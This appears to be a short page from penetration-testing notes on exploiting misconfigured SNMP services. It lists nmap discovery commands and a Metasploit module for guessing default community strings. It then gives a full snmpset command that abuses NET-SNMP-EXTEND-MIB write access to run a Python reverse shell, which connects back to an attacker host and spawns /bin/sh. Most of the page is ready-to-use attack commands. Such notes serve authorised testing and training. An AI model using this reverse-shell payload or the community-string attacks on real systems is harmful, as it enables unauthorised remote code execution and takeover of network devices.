Simple Network Management Protocol (SNMP)

The SNMP protocol provides a way for devices on a network to share information with one another. As an attacker, we can sometimes leverage a misconfigured SNMP service to obtain detailed information about the system and/or execute arbitrary code.

Exploitation

Identifying SNMP on a Network

# Identify SNMP utilizing Nmap
nmap -sU -p161 $hosts 

# Identify SNMP and retrieve server type / operating system with Nmap
nmap -sU -p161 $hosts --script=snmp-sysdescr

Identifying Default Community Strings

# Identify Default Community Strings with Metasploit
auxiliary/scanner/snmp/snmp_login

Exploiting SNMP with Write Access

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $targetip \ 
 'nsExtendStatus."evil"' = createAndGo \
 'nsExtendCommand."evil"' = /usr/bin/python \
 'nsExtendArgs."evil"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$ip\",$port));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

References

SNMP… Strings Attached! - Black Hills Information SecurityBlack Hills Information Security

PreviousSegmentation Testing NextSubnet Enumeration

Last updated 1 year ago